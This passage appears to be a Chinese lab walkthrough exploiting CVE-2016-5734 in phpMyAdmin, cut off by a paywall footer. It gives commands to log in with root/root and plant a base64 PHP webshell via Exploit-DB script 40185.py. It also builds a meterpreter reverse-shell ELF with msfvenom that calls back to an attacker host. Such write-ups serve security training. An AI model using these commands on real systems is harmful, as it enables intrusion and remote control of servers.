CVE-2016-5734
1.访问8080端口,用弱口令root root登录
2. 在Kali中有自带的EXP:
searchsploit phpmyadmin
3.进入该目录:/usr/share/exploitdb/exploits/php/webapps,通过EXP写入一句话木马:
python3 40185.py -u root --pwd="root" http://192.168.225.139:8080/ -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4='));"

4.用蚁剑连接:

5.然后通过msfvenom生成木马:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.225.133 LPORT=2333 -f elf>/root/sa.elf

6.通过蚁剑把sa.elf上传到容器的/tmp环境下,/tmp环境是临时文件目录普通用户的权限都比较大

最低0.47元/天 解锁文章
3668

被折叠的 条评论
为什么被折叠?



